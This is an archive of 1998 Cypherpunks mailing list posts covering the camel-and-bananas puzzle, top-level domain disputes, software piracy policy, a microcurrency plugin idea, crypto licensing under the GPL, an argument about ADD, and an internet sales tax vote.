Date: Fri, 2 Oct 1998 19:13:39 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: A Number Theory Problem....
Message-ID: <199810030016.TAA26844@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



There is a desert which is 1000 miles across. There is a camel who can carry
1000 bananas maximum. The camel eats 1 banana per mile travelled. The camel
has a total of 3000 bananas to begin with. What is the maximum number of
bananas that the camel can get across to the other side uneaten?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------

A: 533




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: J-Dog <J-Dog@Elitehackers.org>
Date: Fri, 2 Oct 1998 22:04:40 +0800
To: Ulf Mller <ulf@fitug.de>
Subject: Re: Is the .to (Tonga) domain completely rogue and should beremoved?
In-Reply-To: <m0zPEQ3-0003bAC@ulf.mali.sub.org>
Message-ID: <Pine.LNX.4.03.9810021955160.28053-100000@BlackBox.elitehackers.org>
MIME-Version: 1.0
Content-Type: text/plain



if you want the long version of it, join gthe NANOG list (North American
Network Operators Group).. but basically, this TLD is mostly a spam/rogue
TLD....

J-Dog

On Sat, 3 Oct 1998, Ulf [iso-8859-1] Mller wrote:

> As mentioned out in NTK, Internet has put set Tuvalu top-level domain
> "on hold". What has happened?
> 
> 
> Registrant:
> Tuvalu top-level domain TV17-DOM
>    Ministry of Finance and Tourism
>    Funafuti,
>    TUVALU
> 
>    Domain Name: TV
>    Domain Status: On Hold
> 
>    Administrative Contact, Technical Contact, Zone Contact:
>       Internet Assigned Numbers Authority  IANA  iana@iana.org
>       (310) 822-1511
> 
>    Record last updated on 15-Sep-98.
>    Record created on 18-Mar-96.
>    Database last updated on 2-Oct-98 03:53:16 EDT.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "kryz" <chrisharwig@hetnet.nl>
Date: Fri, 2 Oct 1998 15:12:13 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Fw: 1998-10-01 VP Announces New Efforts to Crack Down on Software Piracy
In-Reply-To: <19981001202053.2.MAIL-SERVER@pub1.pub.whitehouse.gov>
Message-ID: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain



To whom it may concern:

----------
| Date: donderdag 1 oktober 1998 20:20:00
| From: The White House
| To: Public-Distribution@pub.pub.whitehouse.gov
| Subject: 1998-10-01 VP Announces New Efforts to Crack Down on Software Piracy
|
|
|                             THE WHITE HOUSE
|
|                       Office of the Vice President
| ________________________________________________________________________
| For Immediate Release                                    October 1, 1998
|
|
|                      VICE PRESIDENT GORE ANNOUNCES
|          NEW EFFORTS TO CRACK DOWN ON SOFTWARE PIRACY WORLD-WIDE
|
|
|      Washington, DC --Vice President Gore announced today that a new
| Executive Order (EO) will direct federal departments and agencies to
| prevent and combat computer software piracy, and the President also will
| direct the United States Trade Representative (USTR) to press foreign
| governments to enact similar protections.
|
|      "Today, we are declaring war on software piracy," Vice President 
| Gore said.  "The message is clear:  don't copy that floppy.  At home or
| abroad,intellectual property must be protected."
|
|      The federal government is the world's largest buyer of
| computer-related services and equipment, at over $20 billion a year. 
| An estimated $11 billion was lost world-wide to software piracy in 1997,
| translating into as many as 130,000 lost jobs in the United States.
|
|      President Clinton's Executive Order directs agencies to:
|
|      Ensure that only authorized computer software is acquired for,
|      and used on, agency computers.
|
|      Ensure that agency policies and practices related to copyrights
|      on computer software are adequate.
|
|      Prepare an inventory of the software on their computers.
|
|      Develop and maintain adequate record-keeping systems for their
|      computer software.
|
|      Vice President Gore said the President is directing USTR Charlene
| Barshefsky to press other governments over the next year to announce
| programs ensuring that their departments and ministries use only
| legitimate software in an authorized manner.  Working closely with
| software companies, USTR will seek to persuade other governments to
| modernize their software management systems, to assess software use
| through comprehensive audits, and to ensure that procurement practices 
| call for, and budgets provide for, acquisition and use of "legal
| software."
|
|      Finally, the Vice President announced that the Commerce Department
| will award 79 new Advanced Technology Program (ATP) grants, worth $82
| million, to keep America at the cutting-edge of technology and
| innovation.  ATP helps fund higher-risk, higher-payoff investments that
| can yield enormous economic benefits.  By requiring cost-sharing from 
| industry, the ATP leverages federal research dollars and encourages
| companies to invest in long-term technological breakthroughs.
|
|      This year's grants will go for, among other things:
|
|      Technology to restore nerve functions to treat victims of
|      spinal cord injuries.
|
|      Life-saving DNA diagnostics at 1/100th of the current cost.
|
|      Digital video technologies that will allow businesses to do
|      video-conferencing over ordinary phone lines.
|
|      Software technologies that will dramatically cut the cost
|      of updating the skills of workers using computer-based
|      training.
|
|                                     ###
|
|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 2 Oct 1998 20:50:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A Number Theory Problem....
In-Reply-To: <v03130301b23b23279c35@[209.66.100.149]>
Message-ID: <199810030150.UAA09171@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim writes:

> Some say 533 and a third.

This is correct if the camel eats bananas continuously, as opposed to
discretely.

Starting with 3,000 bananas, the camel can deposit 2,000 bananas 200 miles
from his starting point.  He can then deposit 1,000 bananas another 333
1/3 miles from that point.  There now remain 466 2/3 miles to go, and
bananas to eat, leaving the camel with 533 1/3 bananas upon reaching the
other side.

If the camel eats bananas in discrete quanta, we lose the fractional
banana. 

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html

 




> 
> What was your point in posing this with the answer at the bottom. This
> problem shows up in the math newsgroups and is not an interesting CP topic.
> 
> --Tim May
> 
> 
> 
> Y2K: A good chance to reformat America's hard drive and empty the trash.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 2 Oct 1998 23:05:41 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: importance of motivation
In-Reply-To: <199810012036.VAA09025@server.eternity.org>
Message-ID: <v03130303b23b51bd9c93@[209.66.100.40]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:46 AM -0700 10/2/98, Blanc wrote:
>Regarding ADD and difficulties with attention spans:

>This could explain ADD/ADHD to some extent, and it probably would yield
>important insights for
>someone to examine their own true motivations when they have problems
>concentrating or paying
>attention.
>
>And there certainly seems to be a significant number of cpunks who claim
>to have this 'syndrome'.

Any trendy new diagnosis always gets some recruits...dyslexia, ADD (*), the
abuse excuse, etc.

(* Like any trendy thing, it gets renamed to keep its panache. ADD has been
renamed to something with four letters, which I now forget (must be ADD).)

We've had some nutballs and losers (luser spelling: loosers) on this list.
People who claim the reason they can't make a coherent argument or hold a
steady job is because of something some psychobabbler told them was their
excuse.

So what else is nu beside e over h?

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Fri, 2 Oct 1998 15:10:12 +0800
To: cypherpunks@cyberpass.net
Subject: re: microcurrency proposal
Message-ID: <3.0.3.32.19981002211612.0088ec30@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Thu, 01 Oct 98 16:20:35 -0700
>From: "Vladimir Z. Nuri" <vznuri@netcom.com>

snip... 

>but I think this is a very promising approach. a company
>can create a plugin that would support microcurrency charges
>for web page hits very easily. 
>
>here's how: the plugin interacts with any site that has
>enabled it. it sends a code to the site using a protocol.
>the site returns pages only upon a valid transaction request.
>for regular browsers without the plugin, the message is,
>"sorry, this page costs $.01, please download so-and-so
>plugin".
>
...

>how would the cash charge work? when the person gets the 
>plugin, they give the plugin company their credit card
>number. the company takes care of the problem of accruing
>micro charges, keeping track of transactions/bills, and 
>billing the credit card in large amounts.
>

Here in Spain prepay telephone cards for cell phones are quite popular. The
idea is that you buy a card for 5000 pesetas ($35) and make calls until it
is exhausted then you get another. As a manner of getting something going
why not charge $5 OR $10 for the download and discount away until the
plug-in is empty. Obviously, there needs to be some way to make sure the
customer doesn't tinker with the value remaining. Pretty much all of the
technology for distribution is already easily available and as mentioned
further on in your letter the amounts are so small that fraud shouldn't be
too much of an issue.

The page generators side is likewise straight forward as they collect the
charge amount and plugin certificate number which they send as a file
periodically to the plugin provider who verifies that no "major" fraud has
occurred and then disburses the funds (minus commission) to the content
provider. Don't get to nervous about the plugin certificate number. These
numbers would not be used to link to a particular user, but rather to make
sure that a $5 dollar cert only runs up $5 of charges after which it is
blocked.

>the problem is trying to transfer money to various individuals
>if their microcharge accounts have a net positive value instead
>of negative (in which case they would be charged their credit
>card at the end of the month). how do you transfer this money?
>
This situation may be addressable in (at least) two ways. Issue a limited
value plugin say for 50 cent increments or incorporate a mechanism for
crediting the plugin. I prefer the first method since the second may make
the system more vulnerable.

>of course, I'm leaving the issue of taxes out of this, but
>the microcharge company could be a point of collection for
>them.
>
The plugin issuer should not be required to be an expert in international
tax law. I think an annual statement of payments sent to the content
provider would probably be sufficient. The concept is that the content
provider has not sold services or content to 50,000 individuals but rather
one customer. I think that pretty much all countries have existing methods
of controlling and collecting taxes based on the income derived from sales
activities. There is no need to make the task of the plugin issuer more
difficult.

>notice that none of what I am proposing above requires any
>new infrastructure whatsoever, except a little programming
>into a plugin. the distribution of the plugin is partly solved
>in that plugins are already distributed all over the net
>and understood by end-users.
>
As my suggestions above demonstrate, I agree that this is perhaps the most
likely way that a "grassroots" based microcurrency system could actually
get off the ground. There is absolutely nothing in this plan that mandates
the participation of major financial entities, which seems to be a major
bottleneck for other systems. (Besides the fact that the big guys don't
seem interested in truly "micro" transactions) This is in fact something
that could very well grow in Internet time scale rather than (conservative)
bankers time.

Al Franco, II




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Fri, 2 Oct 1998 15:10:59 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Clear and present danger: FIGHT AGAINST NATIONAL ID CARD (fwd)
Message-ID: <3.0.3.32.19981002214238.0088e550@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: Jim Choate <ravage@einstein.ssz.com>
>Three branches of government? Between the state and federal?
>
>I don't think so...
>
>There are *THREE* (3) EQUALY powered members in the government of the United
>States of America; federal, state, and the people.
>
I think the original message speaks of executive, legislative, and judicial
branches. As defined by the constitution this is, in fact, the federal
government. As a matter of practice, most if not all, of the states are
also divided this way. Article X which you quoted supports the tacit
understanding that We, the people, are not actually THE government. We, the
people, have, by this the supreme law of the land, authorized the formation
and maintenance of a government which by this same document We authorize to
govern us. I don't really see anywhere that says we can't revoke our
authorization. But I also don't see anything that places We, the people,
inside the government structures.

Remember, there was a great deal of fuss made by the framers of that great
document about giving the People too much power. That's why there were
originally a lot of limits on direct election of top officials. Hell
technically, we still don't directly elect the president. The electoral
college does. We also cannot directly propose or implement legislation.
Some states do allow this level of popular intervention but the sad fact is
we still don't have a national referendum.

The statement you made that, "There are *THREE* (3) EQUALLY powered members
in the government of the United States of America; federal, state, and the
people." Is simply not true. The states are no longer equals to the feds,
and We the people are in today's world much less than equal to either.

Al Franco, II





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 3 Oct 1998 16:16:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <3.0.5.32.19981003003611.00b80100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> The big issue I see with GPL and Crypto software is that with the GPL
>> you cannot add any redistribution restrictions.  The problem is that
...
>Ahh, but it's not *you* who's putting the restrictions on your software,
>but the U.S. government.  As far as I know (not that I'm a lawyer, or
>anything) the U.S. govt. doesn't care what your license says --if it's
>strong crypto, it's not supposed to be exported. 

Depends on how you write your restrictions - I've seen products that
range from "We the copyright holder refuse to let you export it and we'll
only sell it to Real Americans with Real US Pedigree Papers who agree
that the Real Yankee Government owns their rights to everything
and agree not to think about letting any Furriners see it" to
"By the way, the US government may not let you export it from the
territory they so unreasonably claim, so you might want to check
with a lawyer if that sort of thing bothers you."


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Fri, 2 Oct 1998 18:28:04 +0800
To: cypherpunks@toad.com
Subject: Re: Is the .to (Tonga) domain completely rogue and should be removed?
In-Reply-To: <v04011750b239ba5e9f37@[139.167.130.248]>
Message-ID: <m0zPEQ3-0003bAC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



As mentioned out in NTK, Internet has put set Tuvalu top-level domain
"on hold". What has happened?


Registrant:
Tuvalu top-level domain TV17-DOM
   Ministry of Finance and Tourism
   Funafuti,
   TUVALU

   Domain Name: TV
   Domain Status: On Hold

   Administrative Contact, Technical Contact, Zone Contact:
      Internet Assigned Numbers Authority  IANA  iana@iana.org
      (310) 822-1511

   Record last updated on 15-Sep-98.
   Record created on 18-Mar-96.
   Database last updated on 2-Oct-98 03:53:16 EDT.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Sat, 3 Oct 1998 03:54:25 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: importance of motivation
In-Reply-To: <v03130303b23b51bd9c93@[209.66.100.40]>
Message-ID: <000c01bdeeac$6ed6d300$3d8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Tim May:

: Any trendy new diagnosis always gets some recruits...dyslexia, ADD (*), the
: abuse excuse, etc.
:
: (* Like any trendy thing, it gets renamed to keep its panache. ADD has been
: renamed to something with four letters, which I now forget (must be ADD).)
:
: We've had some nutballs and losers (luser spelling: loosers) on this list.
: People who claim the reason they can't make a coherent argument or hold a
: steady job is because of something some psychobabbler told them was their
: excuse.
.............................................................................


You're just a bit subtle, Tim.

It is true that ineffectual psychotherapists and their victim patients often conspire together to
maintain that presentation of the patient as being an invalid, a victim of circumstance, for
whatever benefits that confers on them both.  But sometimes these patients are children, who
wouldn't know how to cooperate in such deceptions.   And although several loons have cycled through
the list, PM is not a loon, and he said he definitely could not maintain his attention without
medicine for ADD.  Not knowing PM very well, I couldn't very well argue with him over whether it was
more the problem of an error in his self-assessment and true interest, and less a medical condition
labelled ADD. (he insisted that he loves what he does)

It can be hard to identify deceptions, lies, and self-deceptions.   There's so many things - people,
drugs, etc - which can prevent one from self-discovery and admission, or things which act as
inducements towards continuing such weaknesses.   For certain adults, I expect that it is a lack of
courage and desire for self-reliance which are the main obstacles standing in the way of getting
over their excuse for acting like 'losers'.   But there are some legitimite problems - nervous,
attentional difficulties - which people can develop and which, aside from the trendy names given to
them, could be improved with serious therapeutic attention.  You'd have to work to know yourself
well, to determine which the real problem is.

l again offer this web site which has information on ways to help oneself towards strengthening
one's physical system to get over attentional and similar problems:   http://www.handle.org.   It is
here in Seattle, but there is now a therapist located in New York City, and clinicians  also travel
to other states and will performa evaluations there (there's a schedule of events listing any
travels to cities in the U.S.)

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 2 Oct 1998 20:52:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
Message-ID: <199810030154.DAA01318@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Richard, you seem to be missing one of the major reasons behind the little
schism developing here.

You say that proprietary software developers shouldn't expect the GNU
project to help them for nothing in return. Thing is, Cypherpunks *want*
to help with crypto -- even if those we help make proprietary software,
and even if we get nothing for our help -- and if GNU folks don't do that,
well, we just won't be GNU folks.

(More generally (and more abrasively), we'd like to make a license suited
to our goals -- meaning one promoting placement of easy-to-use
cryptography wherever it can be useful (including (gasp) in proprietary
software) and discouraging the spread of incompetently-done, weak, or
escrowed crypto -- and the GNU GPL just isn't it)

By the way, regarding the GNU GPL's interaction with export regs:

     In general, the fact that action A is illegal does not mean you
     must include a requirement in your distribution terms not to do
     A. ...

I agree that what you say is correct and, logically, should apply to
crypto regs*, but in practice, failing to include the requirement you
mention is asking for trouble. Ask Cypherpunks if you want to know more
about that, as I believe elaboration in this post would draw <ahem>s from
our beloved retromoderator.

* Logically, crypto regs shouldn't even exist in a marginally free
society, but, again, this is deep in <ahem> territory.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 3 Oct 1998 07:37:19 +0800
To: cypherpunks@toad.com
Subject: Netsurfer Digest: Vol. 04, #29
Message-ID: <v04011713b23bc610bde4@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: editor-bounce@netsurf.com
Date: Fri, 2 Oct 1998 19:22:38 -0700 (PDT)
X-Authentication-Warning: smtp2.zocalo.net: editor set sender to
editor-bounce@netsurf.com using -f
Subject: Netsurfer Digest: Vol. 04, #29
Mime-Version: 1.0
Precedence: bulk

NETSURFER DIGEST
More Signal, Less Noise Volume 04, Issue 29
Wednesday, September 30, 1998

<snip>

BREAKING SURF

Credit Card Data Compromised at Online Auction Sites

Mark Dodd owns AuctionWatch, a neat auction site information center. He was
running searches on the major search engines and by sheer accident
uncovered a security hole in some software used by many of the online
auction houses. It's a big one, too. If the auction site misconfigures its
software, and apparently many do, the first happy hacker to come along can
steal its customers' credit card numbers and addresses. Mark went to CNet
with the story, which warned many of the affected sites of the potential
havoc and scooped up a good story in the process. Remember, the safety of
your credit card data is only as good as the security savvy of the
webmaster guarding it. AuctionWatch: <http://www.auctionwatch.com/>
http://www.auctionwatch.com/
CNet: <http://www.news.com/SpecialFeatures/0,5,26760,00.html>
http://www.news.com/SpecialFeatures/0,5,26760,00.html

<http://adex3.flycast.com/server/socket/127.0.0.1:2800/click/NetsurferDigest/int
ernetnews/123456>
New Hacker Tactic: Slow, Coordinated Attacks from Multiple Locations

A clever new twist in the evolutionary arms race between hackers and online
security forces gives us an excuse to bring you this fascinating Web site.
Hackers, it seems, have discovered herding behavior. Their latest tactic is
to coordinate probes and attacks against online sites from a large number
of separate machines and over a long period of time. By limiting probes to
rates as low as two per hour and dispersing their sources, hackers can
probe beneath current security software's threshold of detection. The Navy
Cooperative Intrusion Detection Evaluation and Response team (CIDER) just
released a report on the technique. The CIDER site is also worth visiting
for information on security and intrusion detection software projects,
notably a database comparing commercial and government tools. Cool spook
stuff. CIDER: <http://www.nswc.navy.mil/ISSEC/CID/>
http://www.nswc.navy.mil/ISSEC/CID/
Report: <http://www.nswc.navy.mil/ISSEC/CID/co-ordinated_analysis.txt>
http://www.nswc.navy.mil/ISSEC/CID/co-ordinated_analysis.txt

<snip>

CONTACT AND SUBSCRIPTION INFORMATION
Netsurfer Digest Home Page:
Subscribe, Unsubscribe:
Frequently Asked Questions:
Submission of Newsworthy Items:
Letters to the Editor:
Advertiser and Sponsor Inquiries:
Netsurfer Communications:
<http://www.netsurf.com/nsd/>http://www.netsurf.com/nsd/
<http://www.netsurf.com/nsd/subscribe.html>http://www.netsurf.com/nsd/subscribe.
html
<http://www.netsurf.com/nsd/ndfaq.html>http://www.netsurf.com/nsd/ndfaq.html
<mailto:pressroom@netsurf.com>pressroom@netsurf.com
<mailto:editor@netsurf.com>editor@netsurf.com
<mailto:sales@netsurf.com>sales@netsurf.com
<http://www.netsurf.com/>http://www.netsurf.com/
CREDITS
Publisher: Arthur Bebak
Editor: Lawrence Nyveen
Contributing Editor:
Production Manager: Bill Woodcock
Copy Editor: Elvi Dalgaard

Netsurfer Communications, Inc.

President: Arthur Bebak
Vice President: S.M. Lieu

Writers and Netsurfers:

Sue Abbott
Regan Avery
Kirsty Brooks
Judith David
Joanne Eglash
Lisa Hamilton
Jay Mills
Elizabeth Rollins
Kenneth Schulze


NETSURFER DIGEST (c) 1998 Netsurfer Communications, Inc. All rights reserved.
NETSURFER DIGEST is a trademark of Netsurfer Communications, Inc.



--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 3 Oct 1998 08:09:44 +0800
To: cypherpunks@cyberpass.net
Subject: RE: importance of motivation
In-Reply-To: <v03130303b23b51bd9c93@[209.66.100.40]>
Message-ID: <v04011716b23bc9b09817@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:00 AM -0400 on 10/3/98, Blanc wrote about Tim's troll:

> : We've had some nutballs and losers (luser spelling: loosers) on this list.
> : People who claim the reason they can't make a coherent argument or hold a
> : steady job is because of something some psychobabbler told them was their
> : excuse.
> .............................................................................
>
>
> You're just a bit subtle, Tim.

Nah. Tim is about as subtle as a loud fart in a Volkswagen.

Or a "troll" under a bridge.


But then, of course, there's actual neuroscience.

I'm pretty epistemological about these things. I for one think that
"talking therapy" is half next to witchcraft, and that that, and other
"biological" approaches to knowlege, where you categorize and catalog
things subjectively and then deduce the world accordingly without benefit
of mathematics, or physics, or chemistry is, frequently, a "luser's"
paradise. Phrenology and astrology come to mind, along with, oddly enough,
people who study lightning without physics, and, of course, so-called
"technical" stock market analysts. ("Fibbronacci retracement", my ass...)


However, I *do* know that when I take ritalin, I can do boring stuff much
easier. I'm a very grouchy bastard, but the boring stuff gets done. And, a
very large percentage of people with the DSM-V "diagnosis" of ADHD (H, for
"hyperactive", is Tim's lost initial there, probably a Freudian slip ;-)),
also focus better with ritalin or dexedrine in their bloodstreams, at least
in clinical trials. I also know that when you run PET scans of people who
have ADD (I'm not as hyperactive as I was as a kid...) their brains look
markedly different from those of  "normal" people when they try to
concentrate on something too long.


I expect that, fairly shortly, neuroscience and psychopharmacology will
tell us all sorts of things about things formerly attributed to mysticism,
ethics, poor mental hygeine, and, of course, motivation.

Scientific determinism may be a bitch, but she's sure an elegant one.

Hell, maybe even "losers" will be curable, someday, if they want to be.


Or even cyphertrolls, for that matter.


Yours in dereliction and lassitude,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 3 Oct 1998 09:36:03 +0800
To: cypherpunks@cyberpass.net
Subject: RE: importance of motivation
In-Reply-To: <000c01bdeeac$6ed6d300$3d8195cf@blanc>
Message-ID: <199810031436.KAA00893@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



'Twould be nice if rationality waned for a generation or
many, give us time to recover from being overdosed with
it since the ahem Renaissance, and suffering the damage of 
Renaissance Persons with pseudo-mastery of more than 
they know how to handle except to blow the shit out of a 
world they cannot truly comprehend except as a clueless
wad defying self-annointe High IQers.

De Toqueville adored patronizing the "American People" of
his time what they were good and bad at (one of the earliest 
promoters of AADD). And every Sheeplemongering weenie 
who lusts to be Somebody whips out the bullfrog's constitutional
and citers it as wisdom for the masses needing superior 
guidance -- that is from-the-mount sermonizing from the 
wannabe mighty-mites who really just want to avoid hard labor, 
an agenda the masses don't get advised to abide.

What's inspiring about misbehavior, for whatever cause,
is that it drives the Reasonable People, those who know
so little they need armoring with tin-thin rationality, into a 
panic of recognition of the alluring siren call to chuck 
overcontrol and enjoy getting under the thinskin of the 
hypo-rougers of a reality ever shedding its skin for new 
realities.

Up ADD, hurrah for hyperrationality, the way past
certain knowledge and comforting wisdom of the
way things are not, never were, never will be.

Medevial superstition, plague, sloth and licentiousness, 
now there's a cheap Ritalin for science and economy and 
law and decency all too reasonable, all too nearly 
inescapable, all too non-fictional to be believed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Oct 1998 12:22:37 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: 2 books of potential interest...
Message-ID: <199810031725.MAA28225@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hello,

I was in Bookstop a while ago and noticed two books that could be of
potential interest.

The first I didn't buy, "We were soldiers once....and young", about the
Ia Drang valley incident in Nov. of 65 (I had stated it was in '64 in the
discussion about "The Best and Brightest"). It is written from notes and
interviews with the survivors apparently. For those who are interested in
the issues that were involved in the Vietnam War it may be of some use.

The Law Enforcement Handbook
D. Rowland, J. Bailey
ISBN 1-56619-471-7
$6.98 (in the cheap books section)

Looks to discuss a majority of police proceedures and details the items of
interest to police officers in performing their duty.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mjmotyka@mistic.net>
Date: Sat, 3 Oct 1998 11:05:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A Number Theory Problem
Message-ID: <361657FE.43E3@mistic.net>
MIME-Version: 1.0
Content-Type: text/plain



> There is a desert which is 1000 miles across. There is a camel who can carry
> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The camel
> has a total of 3000 bananas to begin with. What is the maximum number of
> bananas that the camel can get across to the other side uneaten?

My camels don't understand/can't eat fractional bananas.

My first camel put 
2000 bananas at 200 miles then 
1001 bananas at 533 miles then
left 1 banana at mile 533 and 
sprinted for home,
arriving with 533 bananas

My second camel put 
2000 bananas at 200 miles then 
1001 bananas at 533 miles then
ate 1 banana at mile 533 and 
found the energy to move the  
1000 bananas to mile 534 and
sprinted for home,
arriving with 534 bananas

My third camel put 
2000 bananas at 200 miles then 
1001 bananas at 533 miles then
ate 1 banana at mile 533 and 
found the energy to move the
1000 bananas to mile 534 and
sprinted for home,
arriving with 535 bananas 
figuring he'd pay 
for his last mile with credit.

My fourth camel,
the biggest strongest camel,
was already waiting 
at the destination and
charged each of the other camels a
50% banana tax, 
rounded up to the nearest banana,
plus a 10 banana collection fee
and left with 832 bananas and 
didn't have to do
anything but paperwork while
the other camels were now short of
bananas and
had to find a new way to get more 
bananas.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Oct 1998 12:56:41 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Internet Sales Tax Killed [CNN]
Message-ID: <199810031800.NAA28444@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Note that I've added a few comments/notes between the supplied quoted
sections. As always I've deleted for brevity.

Forwarded message:

> X-within-URL: http://www.cnn.com/ALLPOLITICS/stories/1998/10/02/internet.tax.ap/

>    By CURT ANDERSON
>    AP Tax Writer
>    
>    WASHINGTON (AP) Legislation allowing states to force mail order and
>    Internet businesses to collect sales taxes failed in the Senate Friday
>    as debate began on how to tax cyberspace commerce.
>    
>    Senators voted 65-30 to table, or kill, an amendment authorizing any
>    state to require companies with significant catalog, mail order or
>    Internet sales to collect their sales tax and send it back to the
>    state.
>    
>    The sponsor, Sen. Dale Bumpers, noted that every business operating in
>    a state with a sales tax must already collect and remit the revenue.
>    He said the amendment effectively would reverse a 1992 Supreme Court
>    decision preventing states from enforcing sales taxes on companies
>    located outside their borders.

Section 8.  The Congress shall have Power      To lay and collect Taxes, 
Duties, Imposts and Excises, to pay the Debts and provide for the common 
Defence and general Welfare of the United States; but all Duties, Imposts 
and Excises shall be uniform throughout the United States; 

	No Tax or Duty shall be laid on Articles exported from any State. 

(Note that it doesn't say "Congress shall make no law..." but rather is an
absolute prohibition of taxes/duties on exports of states. It therefore
falls under the "prohibited" clause of the 10th.)

>    "If they choose to have a sales tax, the federal government should
>    allow them to enforce it," said Bumpers, D-Ark.
>    
>    Opponents, however, called the measure a hidden tax increase and were
>    able easily to defeat it for the sixth straight year.
>    
>    "Since this tax has never been collected, there's only one way to view
>    it," said Commerce Committee Chairman John McCain, R-Ariz.

As unconstitutional.

[remainder deleted]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

